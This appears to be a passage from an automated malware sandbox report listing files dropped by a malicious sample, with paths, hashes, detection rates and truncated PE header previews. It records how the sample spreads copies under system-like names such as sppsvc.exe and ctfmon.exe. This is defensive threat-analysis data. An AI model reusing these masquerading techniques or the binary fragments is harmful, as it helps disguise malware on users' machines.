SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\oHbTlmtF.log

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	5.41854385721431
Encrypted:	false
SSDEEP:	384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
MD5:	BBDE7073BAAC996447F749992D65FFBA
SHA1:	2DA17B715689186ABEE25419A59C280800F7EDDE
SHA-256:	1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
SHA-512:	0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 9%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\pDLUlABc.log

Download File

Process:	C:\Program Files (x86)\Reference Assemblies\sppsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\pRAsNhes.log

Download File

Process:	C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\qqitJWYB.log

Download File

Process:	C:\Program Files (x86)\Reference Assemblies\sppsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	5.41854385721431
Encrypted:	false
SSDEEP:	384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
MD5:	BBDE7073BAAC996447F749992D65FFBA
SHA1:	2DA17B715689186ABEE25419A59C280800F7EDDE
SHA-256:	1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
SHA-512:	0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 9%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\sNIJIutM.log

Download File

Process:	C:\Recovery\ctfmon.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\swusCNgs.log

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\tngbTVgk.log

Download File

Process:	C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	5.41854385721431
Encrypted:	false
SSDEEP:	384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
MD5:	BBDE7073BAAC996447F749992D65FFBA
SHA1:	2DA17B715689186ABEE25419A59C280800F7EDDE
SHA-256:	1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
SHA-512:	0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 9%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\uPLTKmLa.log

Download File

Process:	C:\Program Files (x86)\Reference Assemblies\sppsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\vPfJpCEr.log

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\vbkkEjci.log

Download File

Process:	C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\vmRteunU.log

Download File

Process:	C:\Program Files (x86)\Reference Assemblies\sppsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\vnARymaC.log

Download File

Process:	C:\Program Files (x86)\Reference Assemblies\sppsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\wSacHBjk.log

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	24064
Entropy (8bit):	5.492504448438552
Encrypted:	false
SSDEEP:	384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
MD5:	0EEEA1569C7E3EBBB530E8287D7ADCF9
SHA1:	3C196FA10144566EBFBEE7243313314094F3A983
SHA-256:	57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
SHA-512:	1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".d...........!.....V...........u... ........@.. .............................."F....@.................................lu..O.................................................................................... ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................u......H........P...$..........,P..x....................................................................................................................................................................(...@/.l#..r\.*................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\xhUJVuRJ.log

Download File

Process:	C:\Program Files (x86)\Reference Assemblies\sppsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	24064
Entropy (8bit):	5.492504448438552
Encrypted:	false
SSDEEP:	384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
MD5:	0EEEA1569C7E3EBBB530E8287D7ADCF9
SHA1:	3C196FA10144566EBFBEE7243313314094F3A983
SHA-256:	57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
SHA-512:	1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".d...........!.....V...........u... ........@.. .............................."F....@.................................lu..O.................................................................................... ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................u......H........P...$..........,P..x....................................................................................................................................................................(...@/.l#..r\.*................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\yFCKRiMT.log

Download File

Process:	C:\Program Files (x86)\Reference Assemblies\sppsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\yqvjUPym.log

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\zLwIlJoB.log

Download File

Process:	C:\Recovery\ctfmon.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\zupqWouz.log

Download File

Process:	C:\Recovery\ctfmon.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Windows\System32\CSCF1A5C7715E64605B8685523D04CDF88.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	1224
Entropy (8bit):	4.435108676655666
Encrypted:	false
SSDEEP:	24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
MD5:	931E1E72E561761F8A74F57989D1EA0A
SHA1:	B66268B9D02EC855EB91A5018C43049B4458AB16
SHA-256:	093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
SHA-512:	1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
Malicious:	false
Preview:	.... ...........................\|...<...............0...........\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

C:\Windows\System32\SecurityHealthSystray.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.956889046269139
Encrypted:	false
SSDEEP:	48:6hpjPtqM7Jt8Bs3FJsdcV4MKe279d8/vqBHGOulajfqXSfbNtm:kP5Pc+Vx9MsvkgcjRzNt
MD5:	B1BD2BFA499EA1D997DFFA4B41557C82
SHA1:	DB7D9728CA4B50237424BC1AB20352BD0502FB0D
SHA-256:	AC4D921690E2F0AFBBED9460131580CAC477D552393C86BAFBAFB0781A7FF1E6
SHA-512:	F23EE2D28C7484C27A9609EA95ED95DB144789612E30A08259E00F2586EA22F07704F202E42A8EC0D2D1172A5EA9AB6F7B370C6730F3942F551F1DA10092BA9D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R..g.............................'... ...@....@.. ....................................@.................................d'..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..<.............................................................(.....0..!.......r...pre..p.{....(....(....&..&......................0..........ri..p(....&..&......................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(......(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

\Device\Null

Download File

Process:	C:\Windows\System32\w32tm.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	151
Entropy (8bit):	4.784779996055318
Encrypted:	false
